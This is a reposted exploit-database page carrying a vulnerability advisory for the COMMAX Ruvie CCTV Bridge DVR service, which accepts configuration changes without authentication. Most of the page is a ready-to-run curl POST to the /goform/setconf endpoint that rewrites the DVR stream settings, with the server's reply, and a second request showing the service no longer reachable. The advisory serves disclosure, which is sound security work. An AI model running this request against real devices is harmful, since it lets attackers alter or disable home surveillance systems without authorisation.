Exploit for COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS

Name: Exploit for COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
Rating: 5 (360 reviews)
2021-08-15 | CVSS 7.4
## https://sploitus.com/exploit?id=ZSL-2021-5666
<html><body><p>COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php


02.08.2021

--


#1

$ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&amp;Ch0=0&amp;dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&amp;dvr1=&amp;dvr2=&amp;dvr3=&amp;dvr4=&amp;dvr5=&amp;dvr6=&amp;dvr7=&amp;dvr8=&amp;dvr9=&amp;dvr10=&amp;dvr11=&amp;dvr12=&amp;dvr13=&amp;dvr14=&amp;dvr15=&amp;dvr16=&amp;dvr17=&amp;dvr18=&amp;dvr19=&amp;dvr20=&amp;dvr21=&amp;dvr22=&amp;dvr23=&amp;ok=OK"

*   Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
&gt; POST /goform/setconf HTTP/1.1
&gt; Host: 192.168.1.1:8086
&gt; User-Agent: curl/7.55.1
&gt; Accept: */*
&gt; Content-Length: 257
&gt; Content-Type: application/x-www-form-urlencoded
&gt;
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
&lt; HTTP/1.0 200 OK
&lt; Server: GoAhead-Webs
&lt; Pragma: no-cache
&lt; Cache-control: no-cache
&lt; Content-Type: text/html
&lt;

<br/><br/></p><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html><html><p>
* Closing connection 0

#2

$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
*   Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
</p></html>